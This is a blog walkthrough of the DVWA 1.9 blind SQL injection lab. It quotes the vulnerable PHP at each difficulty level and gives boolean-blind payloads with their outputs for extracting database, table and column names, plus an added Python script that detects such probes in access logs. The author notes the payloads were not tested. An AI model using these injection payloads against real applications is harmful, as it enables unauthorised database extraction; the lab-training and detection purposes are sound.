DVWA 1.9: SQL Injection (Blind) | LSABLOG


DVWA 1.9: SQL Injection (Blind)

Low:

Key source code:

    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

1. Identify the injection type:

Input: 1' and 1=1;#

Output: User ID exists in the database.

Input: 1' and 1=2;#

Output: User ID is MISSING from the database.

So this is a string-type (quoted) injection.

2. Extract information about the current database:

Determine the length of the database name:

Input: 1' and length(database())=1;#

Output: User ID is MISSING from the database.

Input: 1' and length(database())=16;#

Output: User ID exists in the database.

So the database name has length 16.

Extract the database name:

Input: 1' and ascii(substr(database(),1,1))>97;#

Output: User ID is MISSING from the database.

Input: 1' and ascii(substr(database(),1,1))<117;#

Output: User ID exists in the database.

Keep bisecting like this until the whole database name is recovered.

3. Extract table names:

Input: 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2;#

Output: User ID exists in the database.

So the database has 2 tables.

Input: 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9;#

Output: User ID exists in the database.

So the first table name has length 9.

Input: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103;#

Output: User ID is MISSING from the database.

Input: 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103;#

Output: User ID is MISSING from the database.

So the first character of the first table name is g (ASCII 103); continue the same way to recover the full table name.

4. Extract column information:

Input: 1' and (select count(column_name) from information_schema.columns where table_name='users')=8;#

Output: User ID exists in the database.

So there are 8 columns.

Input: 1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7;#

Output: User ID exists in the database.

So the first column name has length 7; then bisect as above to recover the column name.

5. Extract the data:

Bisection as above.
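One way to spot this probing on the server side, as an added example that is not from the original post or from DVWA: a small Python script that decodes the id parameter from web-server access-log lines, flags the boolean-blind signals used in steps 1 to 5 above, and groups repeated probe shapes per client, since a bisection produces many near-identical requests that differ only in the compared number. The log lines, client addresses and the repeat threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not taken from DVWA or the original
# post), shaped like the Low-level probes above sent to the sqli_blind page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+1%3D1%3B%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+1%3D2%3B%23&Submit=Submit HTTP/1.1" 200 4315
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3E97%3B%23&Submit=Submit HTTP/1.1" 200 4315
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3C117%3B%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3C107%3B%23&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4321
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+)')
# Signals from the walkthrough: 1=1/1=2 pairs, information_schema, ascii(substr()), length(database())
PROBE_RE = re.compile(r"\band\s+\d+\s*=\s*\d+|information_schema"
                      r"|ascii\s*\(\s*substr\s*\(|length\s*\(\s*database\s*\(", re.I)

def decoded_id(url):
    """Return the URL-decoded value of the id= query parameter, or None."""
    if "?" not in url:
        return None
    for pair in url.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == "id":
            return unquote_plus(value)
    return None

def template(payload):
    """Collapse integers and comparison operators so every step of a
    bisection over ascii()/length() values maps to the same key."""
    return re.sub(r"[<>]=?|=", "OP", re.sub(r"\d+", "N", payload.lower()))

def find_blind_probes(log_text, min_repeats=3):
    """Return (flagged, sweeps). flagged maps client ip -> decoded payloads that
    match a probe signal; sweeps lists (ip, template, count) where one client
    repeated the same probe shape >= min_repeats times: a bisection in progress."""
    flagged, shapes = defaultdict(list), defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        payload = decoded_id(m.group("url")) if m else None
        if payload is None or not PROBE_RE.search(payload):
            continue
        flagged[m.group("ip")].append(payload)
        shapes[(m.group("ip"), template(payload))] += 1
    sweeps = [(ip, t, n) for (ip, t), n in shapes.items() if n >= min_repeats]
    return dict(flagged), sweeps
```

Running find_blind_probes(SAMPLE_LOG) flags only 10.0.0.5 and reports one sweep: three requests sharing the ascii(substr(database(),N,N)) shape, while the plain id=2 request from 10.0.0.9 is ignored.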


Medium:

Key source code:

    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

mysql_real_escape_string is applied to the input, escaping the special characters \x00, \n, \r, \, ', " and \x1a, and the front end restricts user input with a drop-down form.

Intercepting and modifying the request is enough: since this is an integer-type injection (the value is not quoted in the query), no special characters are needed, so the escaping does not help.


High:

    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

The parameter is passed in a cookie, LIMIT 1 restricts the result set, and rand() disrupts time-based blind injection. Since the trailing # comments out the LIMIT 1, the boolean-based blind injection from above can be used as-is.


Impossible:

Key source code:

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

The token prevents CSRF, the is_numeric check rejects non-numeric input, and the PDO prepared statement separates data from code; no solution for now.

==================================================

Since my lab environment is not convenient at the moment, I have not tested these myself, but the method is the same; there is more than one possible injection statement, and any that reaches the goal is fine.